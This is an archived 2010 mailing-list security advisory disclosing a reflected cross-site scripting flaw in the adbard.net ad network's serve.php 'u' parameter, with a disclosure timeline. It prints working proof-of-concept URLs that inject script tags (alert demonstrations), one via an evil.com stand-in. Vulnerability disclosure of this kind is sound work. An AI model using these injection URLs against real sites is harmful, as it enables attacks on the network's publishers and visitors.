| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <AANLkTindBM9TJjj92whDEY3c7F=J06PMrxWPkEZJ7HUj@mail.gmail.com> Date: Wed, 18 Aug 2010 13:02:22 +0800 From: YGN Ethical Hacker Group <lists@...g.net> To: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com Subject: Ad Bard Network(adbard.net) - network-wide Cross Site Scripting Vulnerability ============================================================================== Ad Bard Network(adbard.net) - network-wide Cross Site Scripting Vulnerability ============================================================================== 1. OVERVIEW A famous advertising network for free/open-source software community, adbard.net, is currently vulnerable to Ad network-wide Cross Site Scripting vulnerability. All its advertising networks (http://adbard.net/adbard/websites) are vulnerable subsequently. Though the vulnerability is not tied to ad network sites, how it can be leveraged depends only on skills and well-thought plans of attackers. 2. SITE SERVICE DESCRIPTION The Ad Bard Network is the only advertising network designed specifically for reaching the developers, architects, users and influencers in the free software community, allowing advertisers to directly communicate with the key customers in this exciting new area. 3. VULNERABILITY DESCRIPTION The serve.php at adbard.net is vulnerable to Cross Site Scripting vulnerability as the "u" parameter is not properly sanitized. The serve.php is linked from Adbard.net's ad script (currently, it is 'http://cdn1.adbard.net/js/ab1.js'). 4. PROOF-OF-CONCEPT/EXPLOIT + Cross Site Scripting (OWASP 2010 Top 10 - A2) http://adbard.net/?xss="><script>alert(/XSS/)</script> http://adbard.net/sites/default/modules/ad/serve.php?k=22e342dc6a6a99267a46f18fc5dcecf1&ab_s=18f5d31e3e39e9d3c8d5b850e79d4848&u=http://evil.com?x=%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E&ab_c=103ffd7e-1ec7-b12d-d12a5ee2a828&r= http://yehg.net/lab/pr0js/advisories/sites/adbard.net/xss/xss_adbard.net-serve.php(u).jpg http://yehg.net/lab/pr0js/advisories/sites/adbard.net/xss/xss_adbard.net.jpg http://yehg.net/lab/pr0js/advisories/sites/adbard.net/xss/xss_hackingexpose.blogspot.com.jpg http://yehg.net/lab/pr0js/advisories/sites/adbard.net/xss/xss_coders.es.jpg http://yehg.net/lab/pr0js/advisories/sites/adbard.net/xss/xss_wiki.phpmyadmin.net.jpg http://yehg.net/lab/pr0js/advisories/sites/adbard.net/xss/xss_clamwin.com.jpg 5. IMPACT As the adbard.net has tons of ad publishers and advertisers, attackers can exploit this flaw for fun and profit. 6. VENDOR Ad Bard Network - http://adbard.net 7. CREDIT This vulnerability was discovered by Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 8. DISCLOSURE TIME-LINE 08-10-2010: vulnerability discovered 08-13-2010: contacted adbard.net and its owner Tag1 consulting via their support email 08-17-2010: got reply that adbard.net's engineers were looking at the issue 08-??-2010: vulnerablity fixed 9. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/view.php/[adbard.net]_xss OWASP Top 10 - http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project #yehg [08-18-2010] _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists